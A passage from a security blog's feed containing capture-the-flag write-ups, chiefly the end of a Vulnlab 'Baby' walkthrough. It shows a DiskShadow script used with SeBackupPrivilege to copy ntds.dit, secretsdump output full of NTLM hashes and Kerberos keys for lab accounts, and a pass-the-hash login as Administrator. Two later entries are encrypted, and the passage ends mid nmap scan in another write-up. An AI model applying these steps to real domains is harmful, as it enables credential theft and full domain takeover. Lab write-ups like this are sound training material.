→ CRLF), ensuring compatibility when transferring scripts to Windows systems.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby unix2dos seb.dsh </span><br><span class="line">unix2dos: converting file seb.dsh to DOS format...</span><br><span class="line">➜  Baby cat seb.dsh </span><br><span class="line">set context persistent nowriters</span><br><span class="line">add volume c: alias seb</span><br><span class="line">create</span><br><span class="line">expose %seb% z:</span><br><span class="line">➜  Baby  </span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Baby/dsh-upload.png"                      alt=".dsh file upload"                ><br><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Baby/dsh-exec.png"                      alt=".dsh exec"                ><br>After running the script with DiskShadow, we successfully exposed the C: drive as Z: and retrieved the ntds.dit file, which contains Active Directory password hashes.</p><div class="code-container" data-rel="Powershell"><figure class="iseeu highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Temp&gt; <span class="built_in">ls</span></span><br><span class="line">    Directory: C:\Temp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line"><span class="literal">----</span>                 <span class="literal">-------------</span>         <span class="literal">------</span> <span class="literal">----</span></span><br><span class="line"><span class="literal">-a----</span>         <span class="number">10</span>/<span class="number">8</span>/<span class="number">2024</span>  <span class="number">11</span>:<span class="number">17</span> AM            <span class="number">613</span> <span class="number">2024</span><span class="literal">-10-08_11-17-52_BABYDC</span>.cab</span><br><span class="line"><span class="literal">-a----</span>         <span class="number">10</span>/<span class="number">8</span>/<span class="number">2024</span>  <span class="number">10</span>:<span class="number">33</span> AM       <span class="number">16777216</span> ntds.dit</span><br><span class="line"><span class="literal">-a----</span>         <span class="number">10</span>/<span class="number">8</span>/<span class="number">2024</span>  <span class="number">11</span>:<span class="number">00</span> AM          <span class="number">49152</span> sam</span><br><span class="line"><span class="literal">-a----</span>         <span class="number">10</span>/<span class="number">8</span>/<span class="number">2024</span>  <span class="number">11</span>:<span class="number">17</span> AM             <span class="number">84</span> seb.dsh</span><br><span class="line"><span class="literal">-a----</span>         <span class="number">10</span>/<span class="number">8</span>/<span class="number">2024</span>  <span class="number">11</span>:<span class="number">00</span> AM       <span class="number">16633856</span> system</span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Temp&gt; download ntds.dit</span><br><span class="line">                                        </span><br><span class="line">Info: Downloading C:\Temp\ntds.dit to ntds.dit</span><br><span class="line">                                        </span><br><span class="line">Info: Download successful!                                                                                                                                                                                      </span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Temp&gt;</span><br></pre></td></tr></table></figure></div><p>Use <code>impacket-secretsdump</code> we can dump hashes of both domain and local.</p><div class="code-container" data-rel="Powershell"><figure class="iseeu highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby impacket<span class="literal">-secretsdump</span> <span class="literal">-sam</span> sam <span class="literal">-system</span> system <span class="literal">-ntds</span> ntds.dit local</span><br><span class="line">Impacket v0.<span class="number">12.0</span> - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Target system bootKey: <span class="number">0</span>x191d5d3fd5b0b51888453de8541d7e88</span><br><span class="line">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)</span><br><span class="line">Administrator:<span class="number">500</span>:aad3b435b51404eeaad3b435b51404ee:<span class="number">8</span>d992faed38128ae85e95fa35868bb43:::</span><br><span class="line">Guest:<span class="number">501</span>:aad3b435b51404eeaad3b435b51404ee:<span class="number">31</span>d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">DefaultAccount:<span class="number">503</span>:aad3b435b51404eeaad3b435b51404ee:<span class="number">31</span>d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">[-] SAM hashes extraction <span class="keyword">for</span> user WDAGUtilityAccount failed. The account doesn<span class="string">&#x27;t have hash information.</span></span><br><span class="line"><span class="string">[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</span></span><br><span class="line"><span class="string">[*] Searching for pekList, be patient</span></span><br><span class="line"><span class="string">[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6</span></span><br><span class="line"><span class="string">[*] Reading and decrypting hashes from ntds.dit </span></span><br><span class="line"><span class="string">Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::</span></span><br><span class="line"><span class="string">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></span><br><span class="line"><span class="string">BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:c5a0ca7d62d259a9ea9f907fc92b6375:::</span></span><br><span class="line"><span class="string">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::</span></span><br><span class="line"><span class="string">baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::</span></span><br><span class="line"><span class="string">baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::</span></span><br><span class="line"><span class="string">baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::</span></span><br><span class="line"><span class="string">baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::</span></span><br><span class="line"><span class="string">baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::</span></span><br><span class="line"><span class="string">baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::</span></span><br><span class="line"><span class="string">baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::</span></span><br><span class="line"><span class="string">baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::</span></span><br><span class="line"><span class="string">baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::</span></span><br><span class="line"><span class="string">baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::</span></span><br><span class="line"><span class="string">[*] Kerberos keys from ntds.dit </span></span><br><span class="line"><span class="string">Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4</span></span><br><span class="line"><span class="string">Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d</span></span><br><span class="line"><span class="string">Administrator:des-cbc-md5:d38cb994ae806b97</span></span><br><span class="line"><span class="string">BABYDC$:aes256-cts-hmac-sha1-96:b7ab21e82d7d818f6e0fef75c1d2786c06c2293d5145b3eee14ca2722cf275e7</span></span><br><span class="line"><span class="string">BABYDC$:aes128-cts-hmac-sha1-96:b757d9d98daea8e8333d7f5e0233306d</span></span><br><span class="line"><span class="string">BABYDC$:des-cbc-md5:a18c49fb837c295d</span></span><br><span class="line"><span class="string">krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97</span></span><br><span class="line"><span class="string">krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14</span></span><br><span class="line"><span class="string">krbtgt:des-cbc-md5:d57383f1b3130de5</span></span><br><span class="line"><span class="string">baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084</span></span><br><span class="line"><span class="string">baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032</span></span><br><span class="line"><span class="string">baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b</span></span><br><span class="line"><span class="string">baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039</span></span><br><span class="line"><span class="string">baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528</span></span><br><span class="line"><span class="string">baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e</span></span><br><span class="line"><span class="string">baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258</span></span><br><span class="line"><span class="string">baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc</span></span><br><span class="line"><span class="string">baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e</span></span><br><span class="line"><span class="string">baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd</span></span><br><span class="line"><span class="string">baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a</span></span><br><span class="line"><span class="string">baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7</span></span><br><span class="line"><span class="string">baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784</span></span><br><span class="line"><span class="string">baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df</span></span><br><span class="line"><span class="string">baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c</span></span><br><span class="line"><span class="string">baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e</span></span><br><span class="line"><span class="string">baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b</span></span><br><span class="line"><span class="string">baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3</span></span><br><span class="line"><span class="string">baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41</span></span><br><span class="line"><span class="string">baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723</span></span><br><span class="line"><span class="string">baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245</span></span><br><span class="line"><span class="string">baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb</span></span><br><span class="line"><span class="string">baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01</span></span><br><span class="line"><span class="string">baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe</span></span><br><span class="line"><span class="string">baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84</span></span><br><span class="line"><span class="string">baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66</span></span><br><span class="line"><span class="string">baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9</span></span><br><span class="line"><span class="string">baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af</span></span><br><span class="line"><span class="string">baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9</span></span><br><span class="line"><span class="string">baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df</span></span><br><span class="line"><span class="string">[*] Cleaning up... </span></span><br><span class="line"><span class="string">➜  Baby </span></span><br></pre></td></tr></table></figure></div><p>Now we got new hash of administrator from ntds.dit</p><p><code>Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::</code></p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">➜  Baby evil-winrm -i 10.10.96.24 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d                                </span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; </span><br></pre></td></tr></table></figure></div><p>With the extracted NTLM hash, we successfully authenticated as the Administrator using Evil-WinRM, gaining full access to the target machine.</p><h3 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h3><p><a class="link"   href="https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/" >Windows Privilege Escalation - SeBackupPrivilege<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Vulnlab" scheme="http://example.com/categories/Vulnlab/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
    <category term="Vulnlab" scheme="http://example.com/tags/Vulnlab/"/>
    
    <category term="ldapsearch" scheme="http://example.com/tags/ldapsearch/"/>
    
    <category term="SeBackupPrivilege" scheme="http://example.com/tags/SeBackupPrivilege/"/>
    
  </entry>
  
  <entry>
    <title>Vintage - Hack The Box</title>
    <link href="http://example.com/2025/02/19/Vintage/"/>
    <id>http://example.com/2025/02/19/Vintage/</id>
    <published>2025-02-19T02:55:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="41230321ab9723cd772786aedef8806cbe90d709674fc9772367540f5222076c">4fa3dd0e055bc1e08bed76c2b86ecb9cf6b5aed8caa51d2144068c3052da44fddfa32561a4d9d4eab66a645334ac7fc99951e77de4c519f204f90b79b22c46fbbed5d5dc5e564de00b49feefcb599f976ea6e0aab88d3979de879c289fb1da81dba3c7ddec5ca6974fb3223859a7d7dbca811dc56a6c686e86af044b96c27698d533d26a61315baed71ff7745e597380407e40b15c6b5e5e48636e47abf8d8e1114d3ba96aee6f0de5b7f95bb64f99ac4c2807387a636cb8fc0594ce2a58ba54058d251f94809d6767c313f815acb0c8f6a5e35d5475930fc583726025f7564e</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>      </label>    </div>  </div></div><link href="/css/hbe.style.css" rel="stylesheet" type="text/css"><script data-swup-reload-script type="module" src="/js/plugins/hbe.js"></script><script data-swup-reload-script type="module">import {initHBE} from "/js/plugins/hbe.js";  log.info(ensurePrefix("hexo-blog-encrypt: loaded."));    initHBE();</script>]]></content>
    
    
    <summary type="html">Here&#39;s something encrypted, password is required to continue reading.</summary>
    
    
    
    <category term="Hack The Box" scheme="http://example.com/categories/Hack-The-Box/"/>
    
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Hack The Box" scheme="http://example.com/tags/Hack-The-Box/"/>
    
    <category term="Impacket" scheme="http://example.com/tags/Impacket/"/>
    
    <category term="Dpapi" scheme="http://example.com/tags/Dpapi/"/>
    
  </entry>
  
  <entry>
    <title>Real World Pentest Story</title>
    <link href="http://example.com/2025/02/18/Work-Notes/"/>
    <id>http://example.com/2025/02/18/Work-Notes/</id>
    <published>2025-02-18T06:53:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">  <script id="hbeData" type="hbeData" data-hmacdigest="b4863c6c1e52788f8f89ae3e036f5ae86f4c9f80b4056b3ed03fe4985a954e9c">4f7dcdadc378b03ba17434884b08c1e6771fa889b213271c15b8b54f285462f47e76d608d977ca377f0fdb4dc1210404452c3465c20a6d254073913ce43c5e0c2504bbeded9021ef94d7caa5501cb89700fe1b5001ece704cd22f8f6fefc476e660b4390301a4bb1ab492a57659695051034fd5427e9fff4b171d4211e11185290507b1ce44524cc48f2605ea7919dc410b9ff733559c4cb18167f9b85d1441563b9bc516e57cb3ab801cecd7fcd240a9a2a727e242d1aed5cc3486ced74bffc4b727a4f5dd91b8667ca4154d64a271a11119a035affa0c8a1b28b08a657ddf30cd1ee2c1bfa5a39c8790859143fb0fd651cd4594d1c7fc03974e4ed159ae91c7ec20429a63d3aeec5095df44d0f6f8fab2367ac64f5d55ad050c795c71aaa13c7a29fd7ebaa30713329e26a4a1a8fe8c9446ea7aeef6b200fb772f7a351a16258bc3b36f6310133cbbf23c2bfbc42a1cc08ed086f84f68239bab6f7346a4494bcc1e3314551d639c17e05eab9a168c95eb1fd1fda93641a49800b6cab806e5b2452613cb865bb4aa5cae678814bbe484bf91e96aebcdbbe86f55ac285eebb95e55ae6ae56221a39ac11a082cf464f937fb79f38af6d964100ed8fc403d6176416d61efb5e29e10e20a50dc937107cbf55a6a1e09e379765508f7912100b2b5b21817021eea8038b29223d83f204e02b6d49b3acb4fa01a271654cada895ff9c596502e3f982be23eb433f032987c6a96ad78b0dbed6b98fa24fafda522edb1abfc6a268a90fad1586dfc4847a32fc5a93aef6a396490b2e99429e4da0077506ee4ffe6257ecf112b098d8fa7e70924621377053b8d27ba17251754f9aef2333d01a86ce73deaa9165155ce13d2d720e1eb6f69a0a73a22ee852d3a21e3529acfed09c1d7ad46e09ef4039e84e8d0d1de6b9f2db8513e456665b150c21cbdc36bdaf2386ecfabfa042449a854e1f7f9bcbc2a0b78d465e689bac33cddab463fe637d222f0014a519090fe940458a0fb088d4ab30af1aef3c750e7c161cad6f48368a8e410a0c96fc38a7f24633c2b6f2c64eac4d35e17caefa65f79bd2b06b244334f2c1ff1de2a2262be613e2da077c2d1469a462554ea67aaa30bc8763e33f4c92add4d73fafea3032b80606ae4e62e334b2b945fdba9e73affe56f9d4e4147a93b1b93a236d68d61883ab9726010e386c76651613b245db4f1276d2336ce5488bc71c7e386f55c15936b0df0a705d8a0aff474868470f17949b2666d917d1b38f8ba71acff027cb947c8e854d5419883ef05ce25d32470b19f8199768fb8ca68e3a107c5c02a641848d817ad054557164f700b82540227b0ecfdcc2d823115e5fa04fea07f7afd399e52fa7ec4bdc0f6cb68484eca18bd09abbaf3d506e8ae25a095bac25ef2ad02b1c468585370ad30c54c14ce1d8ae2ac26c238838f1edc3b272710ca2810d1aef7dc27fa4538a52b6b16252e1028c2bbabdf29bb582b8df7ae0812f45b8b3c1ea655b92af8e4a8e011927bd98fb69fa4d489575097daa0583b4365fe8d5a55471ecc648884aff1ab53b787835869b284ea98efd71573414103900db6740ecd88fc62af264d2f2667024ce59722cfad3bf5fcff55b23ce4a0934dca84f4448704470a59bcf8f6b45373c8d19446062eab3a006cb05909935bad9ddd1a3251753b17d89773b4adc3ec7876b5837354e95dbe67b66dda066fb670ade110c8034f2aacc509dd8cb3283439be5c2a52028d92c9c347ab379e11d4b71ec881f122e066561ee12c2e6678fb225096e0424435b610a5101cb8bf23539a4a92e18521315446ce169d0ff68b8eb2db9908b1f54045f9a05d078b17dd7a9f8dff2cf0b181d592250338be332639a02dde8074c4de77f4b4a47c3b5065f1851202b79c770a4231922ddb8ee9633d24891ec4e0de035f39394cb915e3495c3094cc145633ded5270537b5406a340aa8b9edfaadb20e6d4e37260188852b282d80788c908da87331a796bceaf7a8deab7aff07aa903bb7d936ea876d6211f50c7c1fbcba31dc930493bd971e8645170f6f278d7c2be8d463d93c18c50144852c4809d57cb243ebd04bc4424f45a4c7cb94464bc1282b1cbf3202c64a6c76d228041922dfc304b9d99277f4290a73201a165a2ec8b31b91ef5960d6b9df7932ecc35dc6c3836fabb4eae741c6b090f89f74ea7295c3bedaa09e00aee8ce9db6367a2c359f0998f0170df745b9b2f928c6d485bfd2cc0dd7a5168f6bff90ae94c0f1f9fdc3a3a9b74042b71a4225bf4b79e1a20b0e93141b6703151308e853a5045f361d06fc7d038df1d2e0ef5a42a71f548d0c8552620a49e980e8d7a86d0c41da2a12a7fbbce1d531e78b43591b2aa55e8518a903c30c4fb5adaa6f2b3bebf4657a2982ad0efaff4608fb87974a94973b9c9ef769b781b6c20edd4a7f7a860103bb2e3f5a2dd2f2245ce9689d0617c03579b024014ae5851ec6e633502be922198cdf4735f74caaf2d401657ccec46ed0e12f61292ee992d7df920db73071fc0a9027dc461c3551a267c8beeff2057bf7b391a17d8c09933887001793e</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>      </label>    </div>  </div></div><link href="/css/hbe.style.css" rel="stylesheet" type="text/css"><script data-swup-reload-script type="module" src="/js/plugins/hbe.js"></script><script data-swup-reload-script type="module">import {initHBE} from "/js/plugins/hbe.js";  log.info(ensurePrefix("hexo-blog-encrypt: loaded."));    initHBE();</script>]]></content>
    
    
    <summary type="html">Here&#39;s something encrypted, password is required to continue reading.</summary>
    
    
    
    <category term="Real World Pentest" scheme="http://example.com/categories/Real-World-Pentest/"/>
    
    
    <category term="Security" scheme="http://example.com/tags/Security/"/>
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Red Team" scheme="http://example.com/tags/Red-Team/"/>
    
    <category term="Exploitation" scheme="http://example.com/tags/Exploitation/"/>
    
    <category term="Web Pentest" scheme="http://example.com/tags/Web-Pentest/"/>
    
    <category term="API Security" scheme="http://example.com/tags/API-Security/"/>
    
    <category term="Cloud Security" scheme="http://example.com/tags/Cloud-Security/"/>
    
    <category term="Lateral Movement" scheme="http://example.com/tags/Lateral-Movement/"/>
    
  </entry>
  
  <entry>
    <title>Administrator - Hack The Box</title>
    <link href="http://example.com/2025/02/01/Administrator-HTB/"/>
    <id>http://example.com/2025/02/01/Administrator-HTB/</id>
    <published>2025-02-01T09:35:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><p>Administrator is a Medium-rated Windows machine on Hack The Box that mimics real-world Active Directory pentesting. We start by using valid credentials for Olivia, who has access to change Michael’s password. After escalating privileges to Benjamin and gaining FTP access, we retrieve a .psafe3 file containing hashes. Cracking those hashes reveals Emily’s credentials, and using BloodHound, we identify a path for privilege escalation to Ethan. We then execute a Kerberoasting attack, crack Ethan’s hash, and gain further privileges. Finally, we dump the Administrator hash by Dsync misconfiguration.</p><h3 id="Nmap-scan"><a href="#Nmap-scan" class="headerlink" title="Nmap scan"></a>Nmap scan</h3>  <div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">➜  Administrator nmap -v -sCV -Pn 10.10.11.42 </span><br><span class="line">Host discovery disabled (-Pn). All addresses will be marked <span class="string">&#x27;up&#x27;</span> and scan <span class="built_in">times</span> may be slower.</span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 04:53 EST</span><br><span class="line">NSE: Loaded 157 scripts <span class="keyword">for</span> scanning.</span><br><span class="line">NSE: Script Pre-scanning.</span><br><span class="line">Initiating NSE at 04:53</span><br><span class="line">Completed NSE at 04:53, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:53</span><br><span class="line">Completed NSE at 04:53, 0.00s elapsed</span><br><span class="line">Initiating NSE at 04:53</span><br><span class="line">Completed NSE at 04:53, 0.00s elapsed</span><br><span class="line">Initiating Parallel DNS resolution of 1 host. at 04:53</span><br><span class="line">Completed Parallel DNS resolution of 1 host. at 04:53, 0.10s elapsed</span><br><span class="line">Initiating SYN Stealth Scan at 04:53</span><br><span class="line">Scanning 10.10.11.42 [1000 ports]</span><br><span class="line">Discovered open port 135/tcp on 10.10.11.42</span><br><span class="line">Discovered open port 21/tcp on 